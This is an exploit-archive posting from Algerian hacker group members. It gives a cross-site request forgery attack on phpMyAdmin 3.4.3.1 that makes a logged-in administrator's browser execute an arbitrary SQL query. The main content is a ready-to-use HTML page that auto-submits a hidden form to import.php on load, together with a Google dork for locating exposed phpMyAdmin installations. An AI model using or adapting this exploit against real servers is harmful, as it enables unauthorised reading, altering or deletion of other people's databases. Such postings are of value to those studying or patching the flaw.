PhpMyadmin XSRF Vuln (Execute SQL Query)

2011-08-12T00:00:00
ID 1337DAY-ID-16665
Type zdt
Reporter Caddy-Dz
Modified 2011-08-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
     \/      \/|__|                                          \/  
			Exploit-ID is the Exploit Information Disclosure
 
Web             : exploit-id.com	
e-mail          : root[at]exploit-id[dot]com             
 
            	   	 #########################################			  
		  	   I'm Caddy-Dz, member of Exploit-Id				
		  	 #########################################			  
======================================================================
####
# Exploit Title: PhpMyadmin XSRF Vuln (Execute SQL Query)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/phpmyadmin/
# Category:: Webapps
# Tested on: [Windows Seven Edition Intégral- French]
####
# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
####


[+] Note :

Only the request executed by the root,users (Server)


[+] Tested on : EasyPhp 5.4alpha2

-Apache 2.2.19
-MySQL 5.5.13
-PhpMyAdmin 3.4.3.1
-Xdebug 2.1.1

[+] Video:

http://www.youtube.com/watch?v=xJH_ujBNTVY

[*] ExpLo!T :

<html>
<head>
 
</head>
 
<body onload="javascript:fireForms()">
<script language="JavaScript">
 
function fireForms()
{
    var count = 1;
    var i=0;
 
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
 
	</script>
<form method="post" action="http://127.0.0.1/home/mysql/import.php"  enctype="multipart/form-data" class="ajax" id="sqlqueryform" name="sqlform"> 
<input type="hidden" name="is_js_confirmed" value="0" /> 
<input type="hidden" name="token" value="47cd4b47756bd497165c6fc7f87d2182" />  <<== make sure you put the right value
<input type="hidden" name="pos" value="0" /> 
<input type="hidden" name="goto" value="server_sql.php" /> 
<input type="hidden" name="message_to_show" value="Votre requête SQL a été exécutée avec succès" /> 
<input type="hidden" name="prev_sql_query" value="" /> 
<textarea type="hidden" tabindex="100" name="sql_query" id="sqlquery"  cols="40"  rows="30"  dir="ltr">Your SQL Query;</textarea> 
<input type="hidden" name="bkm_label" value="" /> 
<input type="hidden" name="bkm_all_users" value="true" /> 
<input type="hidden" name="bkm_replace" value="true" /> 
<input type="hidden" name="sql_delimiter" value=";" /> ]
<input type="hidden" name="show_query" value="1" checked="checked" /> 
</form> 


####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
  RmZ ...others                                                                              |
============================================================================================ |



#  0day.today [2018-01-01]  #